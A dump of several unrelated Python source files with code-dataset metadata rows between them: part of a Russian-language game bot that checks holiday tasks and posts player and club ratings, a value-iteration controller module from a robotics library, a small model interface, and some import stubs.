a = int(pet["score"]) - user_task.progress
progress = user_task.progress + a
else:
# количество очков уменьшилось
progress = int(pet["score"])
end = progress + 30
crud.update_user_task(id=user_task.id,
progress=progress)
if end != 0:
crud.update_user_task_end(id=user_task.id,
end=end)
else:
crud.update_user_task(id=user_task.id,
progress=user_task.end,
status="completed")
await functions.add_user_points(user_id=user.user_id,
task_name="races")
crud.update_charm_place(pet_id=pet["pet_id"],
place=pet["place"],
score=pet["beauty"])
page += 1
if page >= 668:
elapsed_time = int(time.time() - time0)
crud.health(races=elapsed_time)
page = 1
time0 = time.time()
await asyncio.sleep(1)
except Exception:
pass
async def checking_avatar_htask(mpets, user, user_task):
today = int(datetime.today().strftime("%m%d"))
avatar_ids = []
if holiday_1402[0] <= today <= holiday_1402[1]:
prize = holiday_1402_prizes['avatar']
avatar_ids = [4, 8]
elif holiday_2302[0] <= today <= holiday_2302[1]:
prize = holiday_2302_prizes['avatar']
avatar_ids = [6, 7]
elif holiday_308[0] <= today <= holiday_308[1]:
prize = holiday_308_prizes['avatar']
avatar_ids = [0, 1]
elif holiday_401[0] <= today <= holiday_401[1]:
prize = holiday_401_prizes['avatar']
avatar_ids = [5, 0]
elif holiday_501[0] <= today <= holiday_501[1]:
prize = holiday_501_prizes['avatar']
avatar_ids = [1, 0]
profile = await mpets.view_profile(user.pet_id)
if profile["status"] != "ok":
return 0
task_name = user_task.task_name
avatar_id = user_task.task_name.split("_")[-1]
avatar_id = avatar_id.rsplit(":", maxsplit=1)[0]
if int(profile["ava_id"]) in avatar_ids:
ava = task_name.split("_", maxsplit=1)[-1]
start_time = ava.rsplit(":", maxsplit=1)[1]
if int(start_time) == 0:
task_name = f"avatar_{avatar_id}:{int(time.time())}"
crud.update_user_task_name(user_task.id, task_name)
else:
left_time = time.time() - int(start_time)
if left_time >= 86400:
crud.update_user_task(user_task.id, user_task.end, "completed")
crud.add_rewards(user_id=user.user_id, points=2, personal_tasks=1, club_tasks=1)
else:
left_time = int(left_time // 60 // 60)
crud.update_user_task(user_task.id, left_time, "waiting")
else:
task_name = f"avatar_{avatar_id}:0"
crud.update_user_task(user_task.id, 0, "waiting")
crud.update_user_task_name(user_task.id, task_name)
async def checking_anketa_htask(mpets, user, user_task):
try:
today = int(datetime.today().strftime("%m%d"))
smiles = []
if holiday_1402[0] <= today <= holiday_1402[1]:
prize = holiday_1402_prizes['anketa']
smiles = ["❤", "❤️", "♥️"]
elif holiday_2302[0] <= today <= holiday_2302[1]:
prize = holiday_2302_prizes['anketa']
smiles = ["⭐️", "⭐"]
elif holiday_308[0] <= today <= holiday_308[1]:
prize = holiday_308_prizes['anketa']
smiles = ["✿ܓ"]
elif holiday_401[0] <= today <= holiday_401[1]:
prize = holiday_401_prizes['anketa']
smiles = ["Никому не верю"]
elif holiday_501[0] <= today <= holiday_501[1]:
prize = holiday_501_prizes['anketa']
smiles = ["Мир, труд, май! ✿", "Мир, труд, май!✿"]
profile = await mpets.view_anketa(user.pet_id)
if profile["status"] != "ok":
return False
task_name = user_task.task_name
anketa_about = task_name.split("_", maxsplit=1)[-1]
anketa_about = anketa_about.rsplit(":", maxsplit=1)[0]
if profile["about"] in smiles or profile["ank"] in smiles:
ank = task_name.split("_", maxsplit=1)[-1]
start_time = ank.rsplit(":", maxsplit=1)[1]
if int(start_time) == 0:
task_name = f"anketa_{anketa_about}:{int(time.time())}"
crud.update_user_task_name(user_task.id, task_name)
else:
left_time = time.time() - int(start_time)
# logger.debug(f"left_time {left_time}")
if left_time >= 86400:
crud.update_user_task(user_task.id, user_task.end, "completed")
crud.add_rewards(user_id=user.user_id, points=2, personal_tasks=1, club_tasks=1)
else:
left_time = int(left_time // 60 // 60)
crud.update_user_task(user_task.id, left_time, "waiting")
else:
task_name = f"anketa_{anketa_about}:0"
crud.update_user_task(user_task.id, 0, "waiting")
crud.update_user_task_name(user_task.id, task_name)
except Exception as e:
logger.error(f"checking_anketa_htask {user.user_id} "
f"error {e}")
async def checking_exchangeGifts_htask(mpets, user, user_task, date):
progress = user_task.progress
page = 1
today = True
gift_ids = []
if holiday_1402[0] <= date <= holiday_1402[1]:
hdate = holiday_1402[2]
prize = holiday_1402_prizes['gifts']
gift_ids = [11, 34]
elif holiday_2302[0] <= date <= holiday_2302[1]:
hdate = holiday_2302[2]
prize = holiday_2302_prizes['gifts']
gift_ids = [26, 27, 35]
elif holiday_308[0] <= date <= holiday_308[1]:
hdate = holiday_308[2]
prize = holiday_308_prizes['gifts']
gift_ids = [45, 46, 47]
elif holiday_401[0] <= date <= holiday_401[1]:
hdate = holiday_401[2]
prize = holiday_401_prizes['gifts']
gift_ids = [32, 33]
elif holiday_501[0] <= date <= holiday_501[1]:
hdate = holiday_501[2]
prize = holiday_501_prizes['gifts']
gift_ids = [2, 45]
while True:
if today is False:
break
today = False
gifts = await mpets.view_gifts(user.pet_id, page)
try:
g = gifts["players"]
except:
logger.error(f"user {user.user_id} {gifts}")
for gift in gifts["players"]:
if ("вчера" in gift["date"] or "сегодня" in gift["date"]) \
and int(gift["present_id"]) in gift_ids:
today = True
if gift["pet_id"] is None:
continue
for ipage in range(1, 5):
leave = True
another_gifts = await mpets.view_gifts(gift["pet_id"], ipage)
try:
g = another_gifts["players"]
except:
logger.error(f"user {user.user_id} {another_gifts}")
for g in another_gifts["players"]:
if g["pet_id"] is None:
continue
if "вчера" in g["date"] or "сегодня" in g["date"]:
leave = False
if ("вчера" in g["date"] or "сегодня" in g["date"]) \
and int(g["present_id"]) in gift_ids and int(g["pet_id"]) == user.pet_id:
if crud.get_pet_pair(pet_id=user.pet_id,
friend_id=gift["pet_id"],
date=hdate) is None:
crud.create_gift_pair(pet_id=user.pet_id,
friend_id=gift["pet_id"],
present_id=gift["present_id"],
date=hdate)
progress += 1
if leave:
break
page += 1
if progress < user_task.end:
crud.update_user_task(user_task.id, progress, "waiting")
else:
crud.update_user_task(user_task.id, user_task.end, "completed")
crud.add_rewards(user_id=user.user_id, points=2, personal_tasks=1, club_tasks=1)
async def start_checking_holiday_tasks(user, date):
user_tasks = crud.get_user_tasks(user.user_id, date)
user_bot = crud.get_bot(user.user_id)
if user_bot is None:
mpets = MpetsApi()
resp = await mpets.start()
if resp["status"] == "ok":
user_bot = crud.create_bot(user.user_id, resp["pet_id"],
resp["name"], resp["password"])
else:
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при создании бота. Пользователь:"
f" {user.user_id}")
return False
if not user_tasks:
return False
mpets = MpetsApi(user_bot.name, user_bot.password)
resp = await mpets.login()
if resp["status"] != "ok":
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при авторизации бота. Пользователь:"
f" {user.user_id}")
mpets = MpetsApi()
resp = await mpets.start()
if resp["status"] == "ok":
user_bot = crud.update_bot(user.user_id, resp["pet_id"],
resp["name"], resp["password"])
else:
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при создании бота. Пользователь:"
f" {user.user_id}")
return False
mpets = MpetsApi(user_bot.name, user_bot.password)
resp = await mpets.login()
if resp["status"] != "ok":
log = logger.bind(context=f"account {resp}")
log.warning(f"Ошибка при авторизации бота. Пользователь:"
f" {user.user_id}")
mpets = MpetsApi()
await mpets.start()
for user_task in user_tasks:
try:
if user_task.status == "completed":
continue
elif user_task.status == "timeout":
continue
elif "avatar" in user_task.task_name:
await checking_avatar_htask(mpets, user, user_task)
elif "anketa" in user_task.task_name:
await checking_anketa_htask(mpets, user, user_task)
elif "gifts" in user_task.task_name:
await checking_exchangeGifts_htask(mpets, user, user_task, date)
except Exception as e:
logger.error(f"start_checking_holiday_tasks {user.user_id} "
f"task {user_task.task_name} "
f"error {e}")
async def checking_holiday_tasks():
logger.debug("start checking_holiday_tasks")
while True:
try:
today = int(datetime.today().strftime("%m%d"))
if holiday_1402[0] <= today <= holiday_1402[1]:
date = holiday_1402[2]
elif holiday_2302[0] <= today <= holiday_2302[1]:
date = holiday_2302[2]
elif holiday_308[0] <= today <= holiday_308[1]:
date = holiday_308[2]
elif holiday_401[0] <= today <= holiday_401[1]:
date = holiday_401[2]
elif holiday_501[0] <= today <= holiday_501[1]:
date = holiday_501[2]
else:
await asyncio.sleep(120)
continue
users = crud.get_users_with_status(status="ok")
tasks, counter = [], 0
for i in range(0, len(users)):
user = users[i]
user_tasks = crud.get_user_tasks(user_id=user.user_id, today=date)
if not user_tasks:
continue
task = asyncio.create_task(start_checking_holiday_tasks(user=user, date=date))
tasks.append(task)
if len(tasks) >= 10:
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
elif i + 1 == len(users):
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
await asyncio.gather(*tasks)
await asyncio.sleep(1)
tasks = []
except Exception as e:
logger.error(e)
await asyncio.sleep(10)
def get_next_user(users):
for user in users:
yield user
async def get_wipe_text_user_rating():
counter, hidden = 1, False
top_users_stats = crud.get_users_stats_order_by_points(limit=30)
text = "🧑 Рейтинг игроков \n\n"
if not top_users_stats:
return "Рейтинг пуст"
users = get_next_user(users=top_users_stats)
last_points = None
while counter <= 10:
try:
user_stats = next(users)
except StopIteration as e:
break
top_user = crud.get_user(user_stats.user_id)
if last_points is None:
# Если в рейтинге есть пользователь с 50 очков и более,
# то активируется более "продвинутый" рейтинг.
if user_stats.points <= 49:
last_points = None
else:
last_points = user_stats.points
text += f"{counter}. {top_user.name} ( {top_user.user_id} ) — {user_stats.points} 🏅\n"
counter += 1
elif last_points == user_stats.points:
last_points = user_stats.points
text += f" {top_user.name} ( {top_user.user_id} ) — {user_stats.points} 🏅\n"
else:
last_points = user_stats.points
text += f"{counter}. {top_user.name} ( {top_user.user_id} ) — {user_stats.points} 🏅\n"
counter += 1
return text
async def get_wipe_text_club_rating():
counter = 1
clubs = crud.get_clubs_stats_order_by_points()
text = "🏠 Рейтинг клубов.\n\n"
if not clubs:
return "❗ Рейтинг пуст."
for club_stats in clubs:
club = crud.get_club(club_stats.club_id)
text += f"{counter}. {club.name} ( {club.club_id} ) — {club_stats.total_tasks} ⛱/" \
f"{club_stats.points}🎈\n"
counter += 1
return text
async def wipe():
wipe = False
while True:
today = int(datetime.today().strftime("%m%d"))
if wipe is True:
break
if today == 906:
notice(await get_wipe_text_user_rating())
notice(await get_wipe_text_club_rating())
crud.wipe()
wipe = True
await asyncio.sleep(10) | 43.377976 | 111 | 0.495043 | 6,536 | 58,300 | 4.189871 | 0.054009 | 0.066898 | 0.020814 | 0.026292 | 0.802556 | 0.764104 | 0.745408 | 0.711923 | 0.677451 | 0.655468 | 0 | 0.020781 | 0.403242 | 58,300 | 1,344 | 112 | 43.377976 | 0.765658 | 0.010497 | 0 | 0.705054 | 0 | 0.002486 | 0.081558 | 0.006779 | 0 | 0 | 0 | 0 | 0 | 1 | 0.000829 | false | 0.017399 | 0.010771 | 0 | 0.038111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c67ad9ca395c66cdcd05d523899084e8a8187450 | 21,482 | py | Python | pyro/planning/valueiteration.py | echoix/pyro | 787920cb14e3669bc65c530fd8f91d4277a24279 | [
"MIT"
] | null | null | null | pyro/planning/valueiteration.py | echoix/pyro | 787920cb14e3669bc65c530fd8f91d4277a24279 | [
"MIT"
] | null | null | null | pyro/planning/valueiteration.py | echoix/pyro | 787920cb14e3669bc65c530fd8f91d4277a24279 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 12 12:09:37 2017
@author: alxgr
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.interpolate import RectBivariateSpline as interpol2D
from scipy.interpolate import griddata
from scipy.interpolate import LinearNDInterpolator
from pyro.control import controller
'''
################################################################################
'''
class ViController( controller.StaticController ) :
"""
Simple proportionnal compensator
---------------------------------------
r : reference signal vector k x 1
y : sensor signal vector m x 1
u : control inputs vector p x 1
t : time 1 x 1
---------------------------------------
u = c( y , r , t )
"""
############################
def __init__(self, k , m , p):
""" """
# Dimensions
self.k = k
self.m = m
self.p = p
controller.StaticController.__init__(self, self.k, self.m, self.p)
# Label
self.name = 'Value Iteration Controller'
#############################
def vi_law( self , x ):
""" """
u = np.zeros(self.m) # State derivative vector
return u
#############################
def c( self , y , r , t = 0 ):
""" State feedback (y=x) - no reference - time independent """
x = y
u = self.vi_law( x )
return u
class ValueIteration_2D:
""" Dynamic programming for 2D continous dynamic system, one continuous input u """
############################
def __init__(self, grid_sys , cost_function ):
# Dynamic system
self.grid_sys = grid_sys # Discretized Dynamic system class
self.sys = grid_sys.sys # Base Dynamic system class
# Controller
self.ctl = ViController( self.sys.n , self.sys.m , self.sys.n)
# Cost function
self.cf = cost_function
# Print params
self.fontsize = 10
# Options
self.uselookuptable = True
##############################
def initialize(self):
""" initialize cost-to-go and policy """
self.J = np.zeros( self.grid_sys.xgriddim , dtype = float )
self.action_policy = np.zeros( self.grid_sys.xgriddim , dtype = int )
self.Jnew = self.J.copy()
self.Jplot = self.J.copy()
# Initial evaluation
# For all state nodes
for node in range( self.grid_sys.nodes_n ):
x = self.grid_sys.nodes_state[ node , : ]
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
# Final Cost
self.J[i,j] = self.cf.h( x )
###############################
def compute_step(self):
""" One step of value iteration """
# Get interpolation of current cost space
J_interpol = interpol2D( self.grid_sys.xd[0] , self.grid_sys.xd[1] , self.J , bbox=[None, None, None, None], kx=1, ky=1,)
# For all state nodes
for node in range( self.grid_sys.nodes_n ):
x = self.grid_sys.nodes_state[ node , : ]
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
# One steps costs - Q values
Q = np.zeros( self.grid_sys.actions_n )
# For all control actions
for action in range( self.grid_sys.actions_n ):
u = self.grid_sys.actions_input[ action , : ]
# Compute next state and validity of the action
if self.uselookuptable:
x_next = self.grid_sys.x_next[node,action,:]
action_isok = self.grid_sys.action_isok[node,action]
else:
x_next = self.sys.f( x , u ) * self.dt + x
x_ok = self.sys.isavalidstate(x_next)
u_ok = self.sys.isavalidinput(x,u)
action_isok = ( u_ok & x_ok )
# If the current option is allowable
if action_isok:
J_next = J_interpol( x_next[0] , x_next[1] )
# Cost-to-go of a given action
Q[action] = self.cf.g( x , u ) + J_next[0,0]
else:
# Not allowable states or inputs/states combinations
Q[action] = self.cf.INF
self.Jnew[i,j] = Q.min()
self.action_policy[i,j] = Q.argmin()
# Impossible situation ( unaceptable situation for any control actions )
if self.Jnew[i,j] > (self.cf.INF-1) :
self.action_policy[i,j] = -1
# Convergence check
delta = self.J - self.Jnew
j_max = self.Jnew.max()
delta_max = delta.max()
delta_min = delta.min()
print('Max:',j_max,'Delta max:',delta_max, 'Delta min:',delta_min)
self.J = self.Jnew.copy()
################################
def assign_interpol_controller(self):
""" controller from optimal actions """
# Compute grid of u
self.u_policy_grid = []
# for all inputs
for k in range(self.sys.m):
self.u_policy_grid.append( np.zeros( self.grid_sys.xgriddim , dtype = float ) )
# For all state nodes
for node in range( self.grid_sys.nodes_n ):
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
# If no action is good
if ( self.action_policy[i,j] == -1 ):
# for all inputs
for k in range(self.sys.m):
self.u_policy_grid[k][i,j] = 0
else:
# for all inputs
for k in range(self.sys.m):
self.u_policy_grid[k][i,j] = self.grid_sys.actions_input[ self.action_policy[i,j] , k ]
# Compute Interpol function
self.x2u_interpol_functions = []
# for all inputs
for k in range(self.sys.m):
self.x2u_interpol_functions.append(
interpol2D( self.grid_sys.xd[0] ,
self.grid_sys.xd[1] ,
self.u_policy_grid[k] ,
bbox=[None, None, None, None],
kx=1, ky=1,) )
# Asign Controller
self.ctl.vi_law = self.vi_law
################################
def vi_law(self, x , t = 0 ):
""" controller from optimal actions """
u = np.zeros( self.sys.m )
# for all inputs
for k in range(self.sys.m):
u[k] = self.x2u_interpol_functions[k]( x[0] , x[1] )
return u
################################
def compute_steps(self, l = 50, plot = False):
""" compute number of step """
for i in range(l):
print('Step:',i)
self.compute_step()
################################
def plot_cost2go(self, maxJ = 1000 ):
""" print graphic """
xname = self.sys.state_label[0] + ' ' + self.sys.state_units[0]
yname = self.sys.state_label[1] + ' ' + self.sys.state_units[1]
self.Jplot = self.J.copy()
## Saturation function for cost
for i in range(self.grid_sys.xgriddim[0]):
for j in range(self.grid_sys.xgriddim[1]):
if self.J[i,j] >= maxJ :
self.Jplot[i,j] = maxJ
else:
self.Jplot[i,j] = self.J[i,j]
self.fig1 = plt.figure(figsize=(4, 4),dpi=300, frameon=True)
self.fig1.canvas.set_window_title('Cost-to-go')
self.ax1 = self.fig1.add_subplot(1,1,1)
plt.ylabel(yname, fontsize = self.fontsize)
plt.xlabel(xname, fontsize = self.fontsize)
self.im1 = plt.pcolormesh( self.grid_sys.xd[0] ,
self.grid_sys.xd[1] ,
self.Jplot.T,
shading='gouraud')
plt.axis([self.sys.x_lb[0],
self.sys.x_ub[0],
self.sys.x_lb[1],
self.sys.x_ub[1]])
plt.colorbar()
plt.grid(True)
plt.tight_layout()
################################
def plot_policy(self, i = 0 ):
""" print graphic """
xname = self.sys.state_label[0] + ' ' + self.sys.state_units[0]
yname = self.sys.state_label[1] + ' ' + self.sys.state_units[1]
policy_plot = self.u_policy_grid[i].copy()
self.fig1 = plt.figure(figsize=(4, 4),dpi=300, frameon=True)
self.fig1.canvas.set_window_title('Policy for u[%i]'%i)
self.ax1 = self.fig1.add_subplot(1,1,1)
plt.ylabel(yname, fontsize = self.fontsize )
plt.xlabel(xname, fontsize = self.fontsize )
self.im1 = plt.pcolormesh( self.grid_sys.xd[0] ,
self.grid_sys.xd[1] ,
policy_plot.T,
shading='gouraud')
plt.axis([self.sys.x_lb[0],
self.sys.x_ub[0],
self.sys.x_lb[1],
self.sys.x_ub[1]])
plt.colorbar()
plt.grid(True)
plt.tight_layout()
################################
def load_data(self, name = 'DP_data'):
""" Save optimal controller policy and cost to go """
try:
self.J = np.load( name + '_J' + '.npy' )
self.action_policy = np.load( name + '_a' + '.npy' ).astype(int)
except:
print('Failed to load DP data ' )
################################
def save_data(self, name = 'DP_data'):
""" Save optimal controller policy and cost to go """
np.save( name + '_J' , self.J )
np.save( name + '_a' , self.action_policy.astype(int))
'''
################################################################################
'''
class ValueIteration_3D( ValueIteration_2D ):
""" Dynamic programming for 3D continous dynamic system, 2 continuous input u """
############################
def __init__(self, grid_sys , cost_function ):
# Dynamic system
self.grid_sys = grid_sys # Discretized Dynamic system class
self.sys = grid_sys.sys # Base Dynamic system class
# Controller
self.ctl = ViController( self.sys.n , self.sys.m , self.sys.n)
# Cost function
self.cf = cost_function
# Options
self.uselookuptable = False
##############################
def initialize(self):
""" initialize cost-to-go and policy """
self.J = np.zeros( self.grid_sys.xgriddim , dtype = float )
self.J_1D = np.zeros( self.grid_sys.nodes_n , dtype = float )
self.action_policy = np.zeros( self.grid_sys.xgriddim , dtype = int )
self.Jnew = self.J.copy()
self.J_1D_new = self.J_1D.copy()
self.Jplot = self.J.copy()
# Initial evaluation
# For all state nodes
for node in range( self.grid_sys.nodes_n ):
x = self.grid_sys.nodes_state[ node , : ]
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
k = self.grid_sys.nodes_index[ node , 2 ]
# Final Cost
j = self.cf.h( x )
self.J[i,j,k] = j
self.J_1D[node] = j
###############################
def compute_step(self):
""" One step of value iteration """
# Get interpolation of current cost space
#J_interpol = interpol2D( self.grid_sys.xd[0] , self.grid_sys.xd[1] , self.J , bbox=[None, None, None, None], kx=1, ky=1,)
cartcoord = self.grid_sys.nodes_state
values = self.J_1D
J_interpol = LinearNDInterpolator(cartcoord, values, fill_value=0)
# For all state nodes
for node in range( self.grid_sys.nodes_n ):
x = self.grid_sys.nodes_state[ node , : ]
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
k = self.grid_sys.nodes_index[ node , 2 ]
# One steps costs - Q values
Q = np.zeros( self.grid_sys.actions_n )
# For all control actions
for action in range( self.grid_sys.actions_n ):
u = self.grid_sys.actions_input[ action , : ]
# Compute next state and validity of the action
x_next = self.sys.f( x , u ) * self.grid_sys.dt + x
x_ok = self.sys.isavalidstate(x_next)
u_ok = self.sys.isavalidinput(x,u)
action_isok = ( u_ok & x_ok )
# If the current option is allowable
if action_isok:
J_next = J_interpol( x_next )
# Cost-to-go of a given action
Q[action] = self.cf.g( x , u ) + J_next
else:
# Not allowable states or inputs/states combinations
Q[action] = self.cf.INF
self.Jnew[i,j,k] = Q.min()
self.J_1D_new[node] = self.Jnew[i,j,k]
self.action_policy[i,j,k] = Q.argmin()
# Impossible situation ( unaceptable situation for any control actions )
if self.Jnew[i,j,k] > (self.cf.INF-1) :
self.action_policy[i,j,k] = -1
# Convergence check
delta = self.J - self.Jnew
j_max = self.Jnew.max()
delta_max = delta.max()
delta_min = delta.min()
print('Max:',j_max,'Delta max:',delta_max, 'Delta min:',delta_min)
self.J = self.Jnew.copy()
self.J_1D = self.J_1D_new.copy()
################################
def assign_interpol_controller(self):
""" controller from optimal actions """
# Compute grid of u
self.u_policy_grid = []
self.u_policy_1D = []
# for all inputs
for k in range(self.sys.m):
self.u_policy_grid.append( np.zeros( self.grid_sys.xgriddim , dtype = float ) )
self.u_policy_1D.append( np.zeros( self.grid_sys.nodes_n , dtype = float ) )
# For all state nodes
for node in range( self.grid_sys.nodes_n ):
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
k = self.grid_sys.nodes_index[ node , 2 ]
# If no action is good
if ( self.action_policy[i,j,k] == -1 ):
# for all inputs
for k in range(self.sys.m):
self.u_policy_grid[k][i,j,k] = 0
self.u_policy_1D[k][node] = 0
else:
# for all inputs
for k in range(self.sys.m):
self.u_policy_grid[k][i,j,k] = self.grid_sys.actions_input[ self.action_policy[i,j,k] , k ]
self.u_policy_1D[k][node] = self.grid_sys.actions_input[ self.action_policy[i,j,k] , k ]
# Compute Interpol function
self.x2u_interpol_functions = []
cartcoord = self.grid_sys.nodes_state
# for all inputs
for k in range(self.sys.m):
values = self.u_policy_1D[k]
self.x2u_interpol_functions.append(
LinearNDInterpolator(cartcoord, values, fill_value=0)
)
# Asign Controller
self.ctl.vi_law = self.vi_law
################################
def vi_law(self, x , t = 0 ):
""" controller from optimal actions """
u = np.zeros( self.sys.m )
# for all inputs
for k in range(self.sys.m):
u[k] = self.x2u_interpol_functions[k]( x )
return u
################################
def plot_cost2go(self, k = 0 ):
""" print graphic """
xname = self.sys.state_label[0] + ' ' + self.sys.state_units[0]
yname = self.sys.state_label[1] + ' ' + self.sys.state_units[1]
self.Jplot = self.J[:,:,k].copy()
###################
fs = 10
self.fig1 = plt.figure(figsize=(4, 4),dpi=300, frameon=True)
self.fig1.canvas.set_window_title('Cost-to-go')
self.ax1 = self.fig1.add_subplot(1,1,1)
plt.ylabel(yname, fontsize = fs)
plt.xlabel(xname, fontsize = fs)
self.im1 = plt.pcolormesh( self.grid_sys.xd[0] ,
self.grid_sys.xd[1] ,
self.Jplot.T,
shading='gouraud')
plt.axis([self.sys.x_lb[0] ,
self.sys.x_ub[0],
self.sys.x_lb[1] ,
self.sys.x_ub[1]])
plt.colorbar()
plt.grid(True)
plt.tight_layout()
################################
def plot_policy_ij(self, k = 0 , ui = 0 ):
""" print graphic """
xname = self.sys.state_label[0] + ' ' + self.sys.state_units[0]
yname = self.sys.state_label[1] + ' ' + self.sys.state_units[1]
policy_plot = self.u_policy_grid[ui][:,:,k].copy()
###################
fs = 10
self.fig1 = plt.figure(figsize=(4, 4),dpi=300, frameon=True)
self.fig1.canvas.set_window_title('Policy for u[%i]'%ui)
self.ax1 = self.fig1.add_subplot(1,1,1)
plt.ylabel(yname, fontsize = fs)
plt.xlabel(xname, fontsize = fs)
self.im1 = plt.pcolormesh( self.grid_sys.xd[0] , self.grid_sys.xd[1] , policy_plot.T )
plt.axis([self.sys.x_lb[0] , self.sys.x_ub[0], self.sys.x_lb[1] , self.sys.x_ub[1]])
plt.colorbar()
plt.grid(True)
plt.tight_layout()
################################
def load_data(self, name = 'DP_data'):
""" Save optimal controller policy and cost to go """
try:
self.J = np.load( name + '_J' + '.npy' )
self.action_policy = np.load( name + '_a' + '.npy' ).astype(int)
self.J_1D = np.zeros( self.grid_sys.nodes_n , dtype = float )
self.Jnew = self.J.copy()
self.J_1D_new = self.J_1D.copy()
self.Jplot = self.J.copy()
# Create 1D J
for node in range( self.grid_sys.nodes_n ):
x = self.grid_sys.nodes_state[ node , : ]
i = self.grid_sys.nodes_index[ node , 0 ]
j = self.grid_sys.nodes_index[ node , 1 ]
k = self.grid_sys.nodes_index[ node , 2 ]
self.J_1D[node] = self.J[i,j,k]
except:
print('Failed to load DP data ' )
| 34.536977 | 130 | 0.43469 | 2,368 | 21,482 | 3.79603 | 0.099662 | 0.059962 | 0.089331 | 0.062298 | 0.846257 | 0.819668 | 0.789076 | 0.782401 | 0.767716 | 0.755479 | 0 | 0.017336 | 0.425379 | 21,482 | 622 | 131 | 34.536977 | 0.710872 | 0.12848 | 0 | 0.683673 | 0 | 0 | 0.014485 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.020408 | 0 | 0.115646 | 0.017007 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c68b4a596b5cfe993c2dc872011ab10261215435 | 177 | py | Python | DLBio/nn_Imodel.py | pgruening/dlbio | 0c4e468bcd5d7e298fbecba13003bcae36889486 | [
"MIT"
] | 1 | 2020-10-08T11:14:48.000Z | 2020-10-08T11:14:48.000Z | DLBio/nn_Imodel.py | pgruening/dlbio | 0c4e468bcd5d7e298fbecba13003bcae36889486 | [
"MIT"
] | 5 | 2020-03-24T18:01:02.000Z | 2022-03-12T00:17:24.000Z | DLBio/nn_Imodel.py | pgruening/dlbio | 0c4e468bcd5d7e298fbecba13003bcae36889486 | [
"MIT"
] | 1 | 2021-11-29T10:31:28.000Z | 2021-11-29T10:31:28.000Z | class IModel(object):
def predict(self, input, do_pre_proc):
raise NotImplementedError
def do_task(self, input, do_pre_proc):
raise NotImplementedError
| 25.285714 | 42 | 0.706215 | 22 | 177 | 5.454545 | 0.590909 | 0.15 | 0.183333 | 0.233333 | 0.7 | 0.7 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0.220339 | 177 | 6 | 43 | 29.5 | 0.869565 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
c6a5194ec0abb6ee98692666d66a79801d206663 | 79 | py | Python | drivers/oneoff_drivers/make_calibration_list.py | lgbouma/cdips | 187e15e620cd44160372dbfa9da989d38722c3e5 | [
"MIT"
] | 1 | 2019-10-04T02:03:25.000Z | 2019-10-04T02:03:25.000Z | drivers/oneoff_drivers/make_calibration_list.py | lgbouma/cdips | 187e15e620cd44160372dbfa9da989d38722c3e5 | [
"MIT"
] | 3 | 2019-08-17T20:33:23.000Z | 2021-08-18T17:55:10.000Z | drivers/oneoff_drivers/make_calibration_list.py | lgbouma/cdips | 187e15e620cd44160372dbfa9da989d38722c3e5 | [
"MIT"
] | null | null | null | from cdips.utils.lcutils import make_calibration_list
make_calibration_list()
| 19.75 | 53 | 0.873418 | 11 | 79 | 5.909091 | 0.727273 | 0.461538 | 0.584615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075949 | 79 | 3 | 54 | 26.333333 | 0.890411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c6ad735c80bc21f5ef159d9fbc9955035293f38c | 206 | py | Python | theseus/utilities/loggers/__init__.py | kaylode/Custom-Template | b2f11bfacf2b03b793476a19781f9046fab6fd82 | [
"MIT"
] | 2 | 2022-02-18T04:41:29.000Z | 2022-03-12T09:04:14.000Z | theseus/utilities/loggers/__init__.py | kaylode/mediaeval21-vsa | 8c5e7d612393d511331124931843c2ed07192c1b | [
"MIT"
] | 8 | 2022-02-16T17:01:28.000Z | 2022-03-28T02:53:45.000Z | theseus/utilities/loggers/__init__.py | kaylode/mediaeval21-vsa | 8c5e7d612393d511331124931843c2ed07192c1b | [
"MIT"
] | 3 | 2022-02-13T05:00:13.000Z | 2022-03-02T00:11:27.000Z | from .observer import LoggerObserver
